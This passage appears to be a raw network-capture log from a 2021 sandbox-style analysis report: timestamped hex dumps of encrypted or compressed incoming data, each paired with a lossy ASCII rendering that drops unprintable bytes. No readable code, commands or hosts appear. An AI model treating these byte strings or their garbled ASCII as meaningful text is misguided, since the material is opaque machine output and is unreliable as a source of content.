                                              2021-11-29 10:29:51 UTC108INData Raw: 6f 57 7c d0 64 05 26 32 27 35 40 f8 4a da 56 23 ea c6 63 29 5f b9 8b 30 31 aa 44 b1 b2 ac 7b 66 06 f6 84 2b 83 61 7d 79 4f 9a 00 8c 4f 96 ed e3 41 a8 86 8e e8 fe 52 92 16 8f e0 ac ee 07 32 d3 02 80 ca d1 bf d3 4e 15 07 39 af 36 eb a4 d4 b2 29 d6 f9 ff e8 c6 4a 3a e4 9e f8 87 8a c5 49 12 18 3c 01 34 62 b8 04 7d 96 e2 4e b4 7e 45 39 f9 35 5e 74 96 3d d6 c6 d4 3f 74 38 ac 01 f9 23 fc b9 89 61 c9 f2 9e 96 e0 03 cf 0b 70 16 5e 7d b8 08 33 ae b2 ac bf 1d 0d b6 28 d5 c5 ed 52 6f f6 87 b0 9a 4f 96 5c 82 31 84 03 c1 57 a9 85 6c 46 52 78 02 e4 a0 c3 af db 6c be 48 d4 f3 b5 53 89 ab c2 3e 94 17 de b8 e1 5d dd bd 6c c3 53 0a fe 0d f9 eb 63 a1 45 fd c5 d2 e2 f6 7f 9f 5d d8 9d e8 f2 43 ef 4b de 62 a3 87 9c a9 75 96 23 a1 28 b5 6c ed 03 cb 67 6f a8 a0 bd f6 7e 29 c3 c9
                                              Data Ascii: oW|d&2'5@JV#c)_01D{f+a}yOOAR2N96)J:I<4b}N~E95^t=?t8#ap^}3(RoO\1WlFRxlHS>]lScE]CKbu#(lgo~)
                                              2021-11-29 10:29:51 UTC109INData Raw: 4e 06 f7 89 d7 c8 69 e2 d7 77 ca 0f 04 23 70 8a 02 aa 1b 07 09 b1 1b be da f7 88 23 75 08 21 db 3a 32 1d a3 8b dd 09 29 20 96 cb d1 02 b1 12 6b fc 71 47 33 8e e2 86 40 21 f3 03 e2 8a fe 1e f0 c1 28 02 c2 55 9a f8 aa 27 e4 e2 9b 23 3c a5 75 d6 d8 5a 9d 82 73 2b 31 43 27 27 9a 10 33 b1 2f c3 a8 27 58 5f 11 7a 28 67 0e a0 f2 16 22 87 15 32 89 85 01 58 77 c0 ee 9e 21 1d d4 03 cf 87 ba 7b 91 0b 8b 67 31 7f 07 ca d4 d8 0c 3d 27 d0 b1 bf e0 e1 a5 13 71 ea 69 1b 97 22 46 03 20 f8 4b 36 2e ea 36 36 bc 73 22 89 f0 61 42 e4 8a 11 c7 17 35 e5 55 a8 e3 78 7d a8 13 ed 69 d4 d1 a4 81 ec c6 5a 61 1c 93 e9 80 e6 91 54 47 19 68 23 0b 4a f1 ba 86 55 b2 70 8b e4 06 b5 f4 d6 39 9b ad c0 c2 cf b2 b0 ae b7 84 8d 1f 60 a9 be 57 eb ae af dd a8 d1 63 34 03 43 78 69 92 fb fe 90 a8
                                              Data Ascii: Niw#p#u!:2) kqG3@!(U'#<uZs+1C''3/'X_z(g"2Xw!{g1='qi"F K6.66s"aB5Ux}iZaTGh#JUp9`Wc4Cxi
                                              2021-11-29 10:29:51 UTC111INData Raw: fe f6 7f 9f 3a bf 9d fd e8 43 ef b9 c4 52 a0 74 31 a9 75 86 cd a1 28 be 44 ea 07 d0 51 19 13 26 bc fc 72 cb ac 75 dc be f3 5a 5b 0e c0 b0 cf 0e 71 6f dd e4 bb a1 ed d5 3d 26 30 bd 51 a9 32 92 ea 43 77 ed a5 bc bc a1 6b d3 bd cf 58 f2 1d ba 45 f6 e3 b9 84 88 79 16 85 b0 88 9d 6d 19 db ef 1e 49 ad 12 fd 7b 69 2e e2 db 02 f3 88 c9 f0 f2 05 03 31 8d 19 6c f4 00 b4 75 21 19 ce d4 b9 57 e9 15 33 c8 29 7d e6 ce 1a f9 88 55 91 50 5a b7 12 10 09 54 4f 71 90 5c 1d af e2 96 de 7d 86 74 95 8b af ec d2 01 74 55 07 f9 0c 56 80 32 c4 c5 7b b9 2f 3e 64 3e 4a 3f 0a f2 0d 0d c2 19 c7 c2 b9 a6 3b c1 83 b9 99 ee c1 9f 50 5e bb ce 05 41 c3 01 2a 2d b8 52 ea d0 13 1e 59 ec af c6 a6 e8 ac ec 58 38 8e 50 40 d3 64 ea 0f ab e1 fd c5 1b 98 20 05 11 33 50 55 39 62 12 76 94 de 6e 00
                                              Data Ascii: :CRt1u(DQ&ruZ[qo=&0Q2CwkXEymI{i.1lu!W3)}UPZTOq\}ttUV2{/>d>J?;P^A*-RYX8P@d 3PU9bvn
                                              2021-11-29 10:29:51 UTC112INData Raw: 24 3a a3 d4 33 bb 94 fe d6 5f 98 c0 c7 b8 92 1d 3a 73 af d1 97 39 bc a5 c2 bf e3 60 5b f7 48 50 5b 85 d3 e6 e5 ba b3 a3 54 81 e7 ba f3 29 cd dd f5 15 e7 34 71 d8 f3 61 6d d1 b4 94 cf bb 39 86 d0 79 83 93 9e 8f 6d 94 8b 43 5d 63 75 77 00 26 35 1b 05 54 ef 68 70 54 25 8f 2a 4a 73 52 b2 9b c7 23 c5 b6 a6 3f ad 53 71 06 e2 9a 17 fc c0 7d 7f 6d a0 2a 62 4d f9 93 f5 cc a5 ae bb eb ea 4c 95 39 3b f3 a4 dc 7e 22 d3 02 9b c1 db d0 cc a0 11 03 50 73 b9 ec ae 0e ab e2 c5 32 ec 28 63 af 3e e4 99 49 9f 98 c0 5a 04 4b a8 00 34 6c ff 78 7f 96 e2 b8 ae 8d 6a e4 fe 0c a0 7a bd 03 d1 42 c2 35 76 3f d7 df ef 0b 55 b1 98 63 05 c2 b9 83 ea 1d 01 50 6f 01 31 88 ad 1c 21 ae 06 ad bf 1d 0d 57 2a d5 c9 ed cb 6d f6 8b e5 8c b0 69 a9 27 34 a6 e6 13 44 a5 82 eb 50 43 49 c1 e1 bd ff
                                              Data Ascii: $:3_:s9`[HP[T)4qam9ymC]cuw&5ThpT%*JsR#?Sq}m*bML9;~"Ps2(c>IZK4lxjzB5v?UcPo1!W*mi'4DPCI
                                              2021-11-29 10:29:51 UTC113INData Raw: 80 59 e8 be d9 b4 17 b6 f0 40 30 ba e7 43 5d 3c e3 17 6c 13 c7 cd 04 8d 27 26 d3 20 5b 40 04 8d 13 5a 97 db 9e 24 d0 e3 48 5d 0d 42 e6 89 c6 15 67 77 4f a4 e6 a4 e0 6a b3 21 93 14 06 c9 64 79 53 30 42 e0 1f f9 51 8b 27 9c 0f ef 55 ee b8 81 cb b9 7f df 90 a2 68 b4 77 fd 54 28 36 0b ab 6e 94 d1 e8 94 b2 23 24 31 c0 e0 19 e1 b0 5d 4a 4c d5 0b 96 cd ce 5d c6 19 6b ef 7a 58 71 5d e3 aa 66 23 e4 d5 e5 dd 02 1f f0 cb 2f 6d 3e 54 9a fe c5 f5 e6 e2 91 70 e6 ca a4 fe d9 50 f2 16 73 2b 37 83 2a 38 d9 03 38 b1 3e ca b7 31 a6 d5 3c 6b 2b 76 16 76 fa a3 32 83 3d 28 88 85 0b 47 60 d3 e5 9c 30 16 cb aa 30 86 96 f0 96 64 77 35 33 79 16 d9 bb 0a 0e 3d 2d cf a0 b7 db e8 b4 ed 6c c3 97 f6 bb 29 24 1d af d3 4d 25 28 e6 15 56 05 73 33 88 fd 99 52 ce 8e 3e 2c ef 34 e3 44 33 a4
                                              Data Ascii: Y@0C]<l'& [@Z$H]BgwOj!dyS0BQ'UhwT(6n#$1]JL]kzXq]f#/m>TpPs+7*88>1<k+vv2=(G`00dw53y=-l)$M%(Vs3R>,4D3
                                              2021-11-29 10:29:51 UTC114INData Raw: d5 93 7f a7 8d bb ba 88 85 10 7f 40 ec 00 07 a4 9e 64 ec f0 7b bf 36 25 7e 2e 53 31 0a e5 0c 3a ba e7 c6 e4 76 a5 34 f3 54 ad 8f ff c7 b7 5e 5f d6 41 1a 0c d0 0a 2a 3c b3 4d c2 2e 87 a7 55 e8 bf dc e6 ae 4c 23 af 27 1d 43 4b d3 9a e1 10 8f 37 f7 ec 12 a6 f4 d1 2c ce 4f 69 02 78 12 67 95 cc 0f 6d c2 cb 44 48 17 5e 30 09 da d0 5a 5f c3 a3 ea b5 e6 7c c3 f8 81 1f 00 c7 44 75 19 ce 52 c7 22 c2 c0 76 0a 89 00 f0 ec 11 b0 96 1b 47 79 de 1e 1f 41 91 e5 d3 a9 37 01 10 cf 91 84 da f1 96 0e 31 03 21 c0 ed 05 c7 59 8a f7 2e 2d 84 21 c2 c9 95 0f 01 6f e1 41 54 38 a3 f3 8d 5f 3b 0d 02 ce a1 fd 17 e7 1b b9 15 18 42 4c 75 81 25 e4 e3 97 78 2e b6 7e fc c8 51 82 ca 8c 2a 1d 73 2e 30 4c 17 5c 4d 2e c1 ae 20 37 28 11 7a 2e 10 de a2 f2 bf 34 5d 7a ef 8b 85 0b 37 8d c1 ee 9a
                                              Data Ascii: @d{6%~.S1:v4T^_A*<M.UL#'CK7,OixgmDH^0Z_|DuR"vGyA71!Y.-!oAT8_;BLu%x.~Q*s.0L\M. 7(z.4]z7
                                              2021-11-29 10:29:51 UTC115INData Raw: d3 6f ee ba 34 53 e5 19 97 8e d5 5f 04 4b dc 00 34 6c 87 69 6a 40 65 49 b6 55 7c 43 a8 1c b3 74 bc 3b c0 4b c0 0f 71 39 c7 14 ed 0b a8 b9 89 7a cb c9 6a aa 89 04 d9 86 77 07 5b 67 52 1d 0b 8c 17 ba 81 48 24 00 28 c9 dc c0 e5 7e f3 91 74 f5 9c 6e a0 83 0a a3 ec d6 52 af 82 e4 5e 58 86 02 c9 23 d7 87 78 6e c5 07 fd a9 b1 51 f8 e7 1d 2e b5 37 ff be c9 62 d1 ab 6c e9 69 76 b9 06 27 ef 73 a3 4f fd c5 b8 83 b0 7e 9f 59 d1 9b 3e ff 7b fd b9 df 62 a0 7d 47 ba 71 84 21 b6 47 a9 6e ed 04 ad 12 6b a8 20 ad f2 7c b8 80 c8 de ba c8 75 27 e6 85 b1 c5 01 6e 08 b7 e6 c0 e8 ff d3 12 56 14 ba 3e c7 3b 90 9b 74 34 ed a1 6b a2 9d b8 ad 2e cf 5a 83 37 a2 44 f2 ff 9d a1 88 79 16 b8 b4 88 91 00 c8 dd 92 52 60 1a 16 ff 73 3e 7f f2 df 2e 87 ca c8 f6 99 cd 2b 2e 8c 65 7c f4 11 bb
                                              Data Ascii: o4S_K4lij@eIU|Ct;Kq9zjw[gRH$(~tnR^X#xnQ.7bliv'sO~Y>{b}Gq!Gnk |u'nV>;t4k.Z7DyR`s>.+.e|
                                              2021-11-29 10:29:51 UTC116INData Raw: 9d ec 73 29 4a 1c 26 27 9e 9e 84 ab 07 f4 a9 27 52 cf 03 77 28 6e 03 bf e6 4b 22 ab 1b 2f 8f 92 9b 70 66 c0 ee 96 2d 02 c1 a9 c3 87 ab ec 8e 00 75 35 1f 79 2c 50 cb d4 1f 30 27 c1 bc bb ca 16 a4 ca 75 fe 43 e8 8c 31 5a 1d bc de 5c c8 2e d5 3c 5d 1d 7e 22 92 ee 7f ad e3 b2 2e 41 6e 7c e2 42 21 6a cf 67 7f 17 39 6f 0c 4a 9e 88 4e d6 59 6b 00 8f e6 85 ff 99 d6 96 18 44 28 1b 63 d8 ab 90 42 31 71 88 fe 2e 03 f9 c9 21 43 bd fc f6 4e 98 b9 25 90 83 17 37 7b 79 ac 5d 3b a7 87 c9 b3 f9 7d 1c 37 48 50 57 e7 e9 f4 e4 a1 b3 b0 40 ba fb bf e2 22 b9 3a f5 39 be 0f bd 91 f2 61 41 d7 99 8e ca b6 36 b9 4e 7b 83 95 f0 85 6a 85 87 79 58 42 4c 63 05 2c 91 22 27 47 e8 73 7a 42 37 f7 6d 67 73 58 ac b0 d5 24 a2 54 b0 a3 ba 73 4e a4 e2 90 35 ba ca 6b e9 69 84 39 65 5d 0c c3 e4
                                              Data Ascii: s)J&''Rw(nK"/pf-u5y,P0'uC1Z\.<]~".An|B!jg9oJNYkD(cB1q.!CN%7{y];}7HPW@":9aA6N{jyXBLc,"'GszB7mgsX$TsN5ki9e]
                                              2021-11-29 10:29:51 UTC118INData Raw: 95 a8 93 65 63 9b 9b ba 82 11 dc d9 fe 11 76 e4 13 d1 72 5d 2f f6 df 3b ff 94 37 f7 b1 c0 15 1b 9d 65 7c f4 11 bb 68 ce 1c 8d 16 ac 44 e6 12 0a 28 30 83 e1 9c 8b d2 8a 74 45 2a 35 7e 18 1b 12 3e 03 17 90 5c 17 82 7d 48 92 37 a3 58 92 9a a9 83 85 f1 4b 06 f3 6f 06 88 9f a0 fb 24 f6 92 25 2d 60 1d 56 3d 84 43 10 ff e9 1d ca e3 45 a4 34 f3 5a bd f6 01 c3 9f 42 52 d1 42 0d 6d c0 03 2a 2d 90 b0 e8 d0 8c a3 ba fb b5 cc 3a e0 a0 0a 5d 31 25 54 71 0a 8c c0 0f a9 f9 f5 c0 d9 9e 34 2d 2f 31 50 4e 07 60 17 4e 30 d3 10 93 c3 f6 52 54 17 b7 e7 b4 c3 03 5c 8d c0 3f d5 c8 e7 70 dc c7 98 07 05 d6 5e 6f 45 ce 52 c7 15 c2 87 9d 0e 89 00 ff 0f c6 b1 96 1c 47 7d de 1e 1f 70 55 99 07 ab 26 0e 0f 5e 6f a9 d9 ef 9a 49 22 19 24 c9 18 1b c4 ae f8 62 23 2e 00 9d d2 c2 46 d5 03 6e
                                              Data Ascii: ecvr]/;7e|hD(0tE*5~>\}H7XKo$%-`V=CE4ZBRBm*-:]1%Tq4-/1PN`N0RT\?p^oERG}pU&^oI"$b#.Fn
                                              2021-11-29 10:29:51 UTC119INData Raw: 53 fb 4a 92 52 23 e6 f7 c5 74 58 ad a2 ce 2b bb 5c b1 17 8e 7e 66 01 40 81 21 bf d6 69 51 e6 8e 28 68 5a 91 ff dd 23 ab 86 88 fe 67 41 86 3e 2d f3 b3 f5 30 35 fb 24 8f c6 df 09 ea be 05 13 2b 90 18 ec a4 de 9b 07 d0 e8 f1 d6 59 ba 3e ee a1 97 97 8e d1 54 12 18 5c 02 34 6e 87 3e 7a 96 e8 63 a5 75 6c 1e fb 0b 3f 4f 96 3b c1 e9 c2 1f 60 2d ac 3d 4e 0b 5f b3 9d 43 1e d9 6f 94 f7 88 de 86 77 17 4d 5d bd 3d 31 90 9d 93 bf 17 24 a2 39 f4 db d1 f1 47 55 8d 8a fe a4 41 60 86 25 aa e6 48 50 af 93 e0 52 70 69 21 e6 a3 5b b8 78 6c bf e0 ed 8b a1 47 97 89 bf 2e b1 35 fd 90 22 54 d0 ad 71 66 6c 0a fe 06 34 c8 74 a8 53 eb 49 ac fe f6 7e 3d 4c fb 89 fc e6 6b 4c b8 df 68 b7 5c 59 aa 75 80 35 2c 2f af 6c ec 16 c4 43 42 0b 24 bc fc 56 d2 c3 c9 d4 ad f5 5e 31 b5 03 b3 c5 03
                                              Data Ascii: SJR#tX+\~f@!iQ(hZ#gA>-05$+Y>T\4n>zcul?O;`-=N_CowM]=1$9GUA`%HPRpi![xlG.5"Tqfl4tSI~=LkLh\Yu5,/lCB$V^1
                                              2021-11-29 10:29:51 UTC120INData Raw: d6 c3 f7 54 4b 8a 00 83 10 0e 18 a6 46 a1 da f7 83 64 13 08 21 db df d3 ea a7 8b cd ae 05 0a 96 ca c2 58 d7 3a 4c fb 71 41 1b 87 e2 86 4a 59 00 02 e2 b4 ed 0a e1 d9 47 f3 c3 55 9c 97 4c 27 e4 e8 88 42 04 ab 74 fc d9 48 b8 c4 95 29 31 5f ab 0d 9a 10 28 a2 33 d0 b4 33 70 fc 14 7a 2e 69 83 a7 f2 b5 22 93 01 2a a1 26 01 58 7d e8 c6 99 21 1b c2 92 26 85 ba eb 80 17 9f 1c 1b 7b 07 da c2 55 0b 3d 27 d1 a5 b0 c4 c0 06 e6 73 e0 41 de 92 22 51 0b 85 3b 49 36 25 d1 d6 47 0e 79 33 9f f7 4f 7b e6 9e 3f 55 98 32 e3 42 24 f0 6c 69 81 a3 e3 78 d0 ef 9f 8d 4e d1 42 5a fb 80 e6 9e da 6f db 68 13 40 95 18 5a ea 86 8d 53 32 75 b3 74 2d 12 f2 c0 be ba bc d0 d5 4b 8a bb 97 1b 92 17 3d 59 35 be 5d 31 af b5 cc af ed 5f 1c 07 49 56 4b 1e fc f4 e4 bb ad bb 47 81 55 bf f3 25 8a ec
                                              Data Ascii: TKFd!X:LqAJYGUL'BtH)1_(33pz.i"*&X}!&{U='sA"Q;I6%Gy3O{?U2B$lixNBZoh@ZS2ut-K=Y5]1_IVKGU%
                                              2021-11-29 10:29:51 UTC122INData Raw: ee 94 d5 73 a9 6d 4b ba 7f 99 0b b2 3f af 7d fa 1d d9 a9 6b 84 2f ad e3 6f d7 59 da db a1 f3 44 32 9d d1 a7 da 16 86 01 92 fa aa a2 ef d9 79 95 23 bb 34 a2 b5 93 e0 3d 2d 82 2d bc af af 03 24 2f cf 52 f4 6d b7 57 e1 e9 84 bf 84 83 3f a1 b3 9e 88 16 c7 ca f8 14 70 0d 0d f1 8f 44 10 fa e7 5e fb 8d c9 e9 90 d6 16 31 96 61 6e 0a 01 92 7d 28 0e b6 15 aa 40 fc 19 e5 2c 06 6d f1 b5 a1 ef 8a 5f f8 12 2c b7 18 1b 07 5e 33 00 90 4d 00 9d 61 b6 d3 40 94 49 83 e4 e5 82 85 05 65 4c f3 e2 04 88 93 04 e0 ed 66 aa 32 2d 70 01 5f 10 f4 f5 2b 2a eb 0d d6 dd e9 11 02 b2 7d 5a 66 f1 e8 8c 5f 5e c7 5c 1e b3 c2 2d 23 53 2b 52 ea da 8b 97 4a ee b5 d7 b1 f6 bd 22 51 14 2e 41 45 fb a0 ef 0f bc e1 d2 c0 1b 94 1c 1c d3 31 5a 66 f6 73 12 76 81 d8 03 84 c3 f6 40 54 13 b7 e7 b4 da 1b
                                              Data Ascii: smK?}k/oYD2y#4=--$/RmW?pD^1an}(@,m_,^3Ma@IeLf2-p_+*}Zf_^\-#S+RJ"Q.AE1Zfsv@T
                                              2021-11-29 10:29:51 UTC123INData Raw: 9f af b9 ab 9c 06 39 0f e5 bf 5d 3f ad a0 f5 af fb 77 32 10 42 23 7f 91 fb f2 f7 aa a8 bf 5b c6 de bd f3 29 b3 d4 e5 19 c5 20 c3 d9 f5 49 6b c1 b1 92 e1 5a 32 ae c9 13 a7 97 f1 90 7d 84 90 64 79 47 58 63 03 0e 1d 31 21 52 c7 8e 7f 56 29 8f c6 4a 73 5e bc b3 de 5a 80 40 a7 39 ad 6a 76 68 fa 91 3f a1 1c 72 5c 6d b9 28 62 41 85 ff dd f4 af 86 84 37 ea 57 8c 29 fa f3 a6 f5 25 32 c4 3c ff 38 26 54 ea b4 06 d1 2c ad aa f9 b5 c2 3d 8d ed 03 06 01 11 bc 14 e4 d9 6e 96 8e d1 5d 06 30 cc 01 34 68 9b b3 7d 96 b6 62 b6 55 6f 3e ed 1d a9 70 96 3a c0 4b d3 3f e9 39 b8 15 80 0a 5f b9 83 69 dd da 60 92 e0 05 c3 86 77 17 45 4c a5 1c 7d 87 11 ac ba 16 25 11 2a df cd d3 8a 8e f7 8d 80 eb ef 5a ab 87 32 c3 f9 c4 57 a5 99 e7 69 ce 78 03 fa 9c b1 86 78 66 b3 31 da a8 b5 59 90
                                              Data Ascii: 9]?w2B#[) IkZ2}dyGXc1!RV)Js^Z@9jvh?r\m(bA7W)%2<8&T,=n]04h}bUo>p:K?9_i`wEL}%*Z2Wixxf1Y
                                              2021-11-29 10:29:51 UTC124INData Raw: 38 30 7a 40 c0 bb ee 0f 50 c9 f6 c0 13 9f 34 3c d1 cf 45 12 11 73 10 74 e0 e6 10 93 c7 9a 29 4a 1e 4d e4 48 80 0a 4d 8b 66 9c ea b5 ed 58 dc d9 92 1e 7d ab 4e 6a 5c 33 47 15 01 d3 51 8b 01 8f 2a da 81 ee 3f 21 60 a8 a8 dc 1a 17 54 30 0a 03 ab 33 23 40 a2 6e 8f a7 88 88 4c 26 0b 37 d3 9d 65 e9 a7 8f d9 58 ae 0b 96 cf f9 ae d7 12 61 fa 65 b9 32 b5 1c 87 4b 2d df 2e e0 b6 70 a9 8d 4f 29 02 c6 57 98 83 28 24 e4 e6 b3 3f 3e a5 7f 81 58 5b 9d e8 76 3d 33 2e a6 26 9a 14 31 ca ad c0 a8 23 70 39 12 7a 22 7a 1a 5e f3 a3 dd 86 19 36 a5 c2 03 5d f9 77 93 18 20 1d d0 b8 cc fc 3e e0 91 0f a3 6c 31 7f 0d a1 57 d9 0c 39 22 c6 b3 df 53 e9 a5 e2 71 91 ed f6 97 26 7f f0 af d3 41 34 2a 77 88 38 88 72 22 87 e1 65 28 64 9f 39 47 3d 6d e1 42 2f 99 fd 7c a9 04 c9 78 da d4 85 8a
                                              Data Ascii: 80z@P4<Est)JMHMfX}Nj\3GQ*?!`T03#@nL&7eXae2K-.pO)W($?>X[v=3.&1#p9z"z^6]w >l1W9"Sq&A4*w8r"e(d9G=mB/|x
                                              2021-11-29 10:29:51 UTC125INData Raw: fd e2 c7 e5 69 dc d7 f4 6d b1 69 a7 99 bf 89 dc ce 71 b3 8c d1 5e 5e 50 2e f2 b4 d1 ad 22 12 27 43 fc ad a8 c9 a6 8c 17 08 ac 20 d5 a7 ee 7f fd a9 66 ed 41 50 80 9e 26 eb 61 95 df d8 e8 98 d8 e8 60 d4 42 d5 b5 c5 f0 43 e9 92 bd 1c 3a 75 9d ad 6a 8f b9 84 05 a3 4a f2 0b cf 0f 75 a4 0c 91 f4 7e c5 e9 ab a0 27 f8 57 21 82 ca 2a e0 28 74 26 a1 ee a4 cf e1 d8 3e 53 23 bb 38 e7 6c ec 79 36 35 e9 ba b6 35 80 41 a6 08 d0 53 e7 1d ba 6c db eb 95 ae b3 1f 40 14 b4 88 9f 1d d5 43 ca 39 6d 3c 0d f1 6e 37 23 ef f7 07 f8 8d cf dc f3 bb 98 30 87 72 66 f9 9a 9b 53 3f 3b be 18 9b d9 e3 12 1b 32 20 55 cd b2 89 ff a2 31 80 b1 5b b7 1c 04 16 c8 05 3a 9f 7a 08 8c 5d d0 d2 6c 80 47 98 b2 84 81 85 07 5e 31 a5 67 07 88 91 08 e3 68 5e 94 2a 0b 7e 19 60 98 0a f4 07 3a e8 31 ea ca
                                              Data Ascii: imiq^^P."'C fAP&a`BC:ujJu~'W!*(t&>S#8ly655ASl@C9m<n7#0rfS?;2 U1[:z]lG^1gh^*~`:1
                                              2021-11-29 10:29:51 UTC127INData Raw: 26 48 2b 37 f6 66 38 09 e6 09 65 82 71 22 83 fb 4f 7e e0 9e 3f 69 7f 4b 7a 43 25 e0 67 4a 33 25 ce 76 fc d8 82 a8 c0 d5 54 72 0a aa cb 96 f2 80 f3 02 67 f1 23 18 5e ff 92 0a 67 03 6f bd ec 16 32 65 d4 33 bd a7 f8 f9 5d 9e a9 95 d2 ec 8e 36 71 ad a1 64 a1 99 82 d3 95 e6 4e 14 95 4b 50 5d 8f d3 d9 e6 ba bf 85 39 d7 6f be f3 2b bd fe 6e 30 c0 03 e0 c6 c9 41 d9 c1 b1 94 d4 9e 1d ac c3 7a a9 ff 8f 0f 6d 94 85 70 6a f0 78 4e 0b 00 2c 08 01 f7 ed 62 7d 4f 0b cd e2 48 75 72 c3 dd 44 34 aa 46 b8 03 31 5e 4b 08 c4 8f 03 8b 64 7f 79 45 91 21 4a 66 94 eb f3 e6 c5 f8 17 e8 ea 42 99 03 b6 c5 81 ea 09 3c ee 22 25 c4 d9 ab ec 89 3c 05 3f be 91 86 da 4d b2 3a d6 f7 c5 64 cb 97 30 c2 87 64 b6 3e d3 5d 06 27 b7 2c 36 68 96 99 17 e8 71 63 b6 51 62 01 77 38 9e 7e b0 24 ff 6b
                                              Data Ascii: &H+7f8eq"O~?iKzC%gJ3%vTrg#^go2e3]6qdNKP]9o+n0AzmpjxN,b}OHurD4F1^KdyE!JfB<"%<?M:d0d>]',6hqcQbw8~$k
                                              2021-11-29 10:29:51 UTC128INData Raw: 18 68 46 68 80 58 8e b2 84 81 85 07 5e 31 a5 67 07 88 91 08 8a 68 5e 94 2a 0b 7e 70 60 a0 0e f4 07 3a ea 31 ea ca 67 a0 17 81 fc 3c 98 ee c7 80 2f c4 f3 66 0b 6b dc 66 0a 87 bc 52 ea cb ae a6 5b f9 b3 ec c8 97 2e dd 50 3c 2b 38 da f6 a6 e5 29 a5 a1 d6 6f 1f 9e 34 32 dc 19 7d 5d 11 75 38 1c e0 4a 11 93 c7 f8 3e d1 3b 64 e8 be d2 63 6d 37 4a 88 ea ae cf 5d de d8 94 3e 6e a8 d6 6b 58 34 4c 81 9a e0 82 85 2d 96 6c d7 40 e9 b1 96 02 0d 81 f1 1c 15 50 61 e4 7c 32 36 0b 1c bf 05 1f ff da 86 6a 3d 63 01 39 e2 1a e8 b8 80 f3 0e 2c 0a 90 e1 bf 3d 4c 13 6b fa 6e 2b a9 86 cf 89 66 35 9f 23 11 b6 fe 1e ef d8 00 2f c0 55 9c d2 c0 5b 7d e3 9b 63 23 c8 ef d9 f4 54 bb f3 1f 0b 39 50 27 27 86 38 1e b3 2f c7 82 49 26 4d 11 7a 2c 60 60 3a d7 98 2c a1 0a 50 a9 8b 04 58 77 df
                                              Data Ascii: hFhX^1gh^*~p`:1g</fkfR[.P<+8)o42}]u8J>;dcm7J]>nkX4L-l@Pa|26j=c9,=Lkn+f5#/U[}c#T9P''8/I&Mz,``:,PXw
                                              2021-11-29 10:29:51 UTC129INData Raw: f8 6a 85 67 ef ba 3a c4 09 5a 96 8e 4b 78 2b 21 b9 21 a5 68 90 b3 5d ef ef 62 b6 4f 55 13 ef 1d b5 5a 14 45 59 4a d3 3b 54 ab b8 15 ed 91 7a 94 98 4d fd 48 6f 92 e0 25 a4 81 77 16 46 54 81 1e 27 80 3b 2e c1 8e 24 00 2c f5 5c c5 e5 6f 6c a8 a7 e5 96 49 30 85 25 ac d1 ba 50 af 93 fc 69 7f 7a 03 f6 9e 55 f9 e1 6d be 46 dc 3d b5 53 83 3b 39 03 a0 19 c9 2c e1 57 d0 8b e0 ec 6b 0a e0 2f 0a e9 65 8d 6f 7f bb 0a ff f6 7b bf c8 d8 9d e8 68 66 c2 a9 f9 42 36 74 9d a9 55 08 24 a1 28 b8 44 c0 00 d0 51 40 2a 5a 25 f7 7e c7 e3 5f de be f9 cd 00 b0 d1 96 e5 93 78 00 be c4 34 ac fe d3 01 56 0c b9 3e cb 18 10 9e ae 34 ed a1 9d 38 a5 6c ad b4 ea 75 e9 54 83 d3 f6 e9 95 88 09 7a 3e 8d af a0 b6 00 d9 df c5 96 1f 83 13 fd 75 65 a4 f3 df 2a 60 a8 e4 e7 bb e5 99 31 87 76 59 60
                                              Data Ascii: jg:ZKx+!!h]bOUZEYJ;TzMHo%wFT';.$,\olI0%PizUmF=S;9,Wk/eo{hfB6tU$(DQ@*Z%~_x4V>48luTz>ue*`1vY`
                                              2021-11-29 10:29:51 UTC130INData Raw: 72 2b dd 44 34 aa 46 87 98 ab 7b 66 9d c7 bd 2d 8d e2 da 79 45 8e 08 57 43 96 eb ea c5 87 ab 8c e9 ec 6c 00 40 b5 e1 ac e0 0f 8b d3 02 8a 5c fc 86 e9 87 31 af 3f b8 bb cc 9a dc b3 3a cd f8 d3 d3 ec ba 38 ce 1a 24 0f 8f d1 59 26 99 9f 01 34 f2 b5 9e 6c b0 c8 cb b6 55 7d 1e a3 15 b3 70 8d 13 ed 49 d3 39 5e bb c6 8c ec 0b 5b 99 23 6b dd da f5 b7 cd 14 ff a6 dd 16 5e 7c 8c 4f 2f 86 11 b6 97 3a 27 00 2e ff 4d bb 7c 6e f6 89 aa 5f b0 69 a3 1f 00 81 e0 e3 77 04 93 e1 41 72 2f 0b f0 b4 c9 af 55 6e be 44 d6 2b cb ca 82 a1 18 0e 1d 3f e9 b8 7b 72 fd ba 40 cb c7 0a fe 07 07 b4 6d 8b 45 e4 ed be fc f6 79 b5 db a6 04 e9 f2 47 cf 15 df 62 a3 ee b8 84 67 a0 03 0c 28 af 6c cd 60 d8 57 6a b7 2b 94 db 7c c3 c5 e3 5c c0 60 56 25 99 e0 1e c5 05 78 9a 9b c9 aa 8d de 7d 16 7e
                                              Data Ascii: r+D4F{f-yEWCl@\1?:8$Y&4lU}pI9^[#k^|O/:'.M|n_iwAr/UnD+?{r@mEyGbg(l`Wj+|\`V%x}~
                                              2021-11-29 10:29:51 UTC131INData Raw: 35 a2 6e 83 f0 71 f7 d5 23 08 25 f1 28 1a e8 a7 11 fe 0e 3c 2c b6 05 d1 43 d5 32 d8 f4 71 47 2c 81 ca ab 42 2a f5 29 64 cc 67 1f f0 c9 08 cd c2 55 9a 62 8f 08 f6 c4 bb a8 3c a5 75 dc 0c 50 9d ec 6d 09 19 78 25 27 9c 3a b5 cf b6 c0 a8 23 78 04 10 7a 28 e5 2b 8d e0 93 03 57 15 3e 89 a5 f6 52 77 c0 f1 bf 09 30 d6 ba c8 ad 3c 9f 08 0a 8b 30 13 ae 07 dc d4 42 29 10 35 f6 91 75 d0 e8 a5 c6 69 e1 69 f7 88 07 7f 30 af d3 4d 1c a9 87 a6 44 0e 77 02 51 e3 67 53 78 bb 14 51 33 15 31 42 25 e4 58 42 a2 00 e3 67 fc ef 98 8a 4e d1 7e f4 6d 1b e7 94 f6 a6 0a 68 19 68 b8 3d 77 f2 8c b0 91 2e 61 9b d3 4b 19 f4 d6 2c 9a 94 fd d6 5f 98 85 39 c6 0b 16 37 75 89 6a 5d 3b bc 35 f8 9e eb 51 14 d7 49 50 5d b3 77 ff e4 ba a6 8a 7b 84 f4 bf f5 05 24 ba 6d 14 ed 09 e6 0c f3 61 45 59
                                              Data Ascii: 5nq#%(<,C2qG,B*)dgUb<uPmx%':#xz(+W>Rw0<0B)5uii0MDwQgSxQ31B%XBgN~mhh=w.aK,_97uj];5QIP]w{$maEY
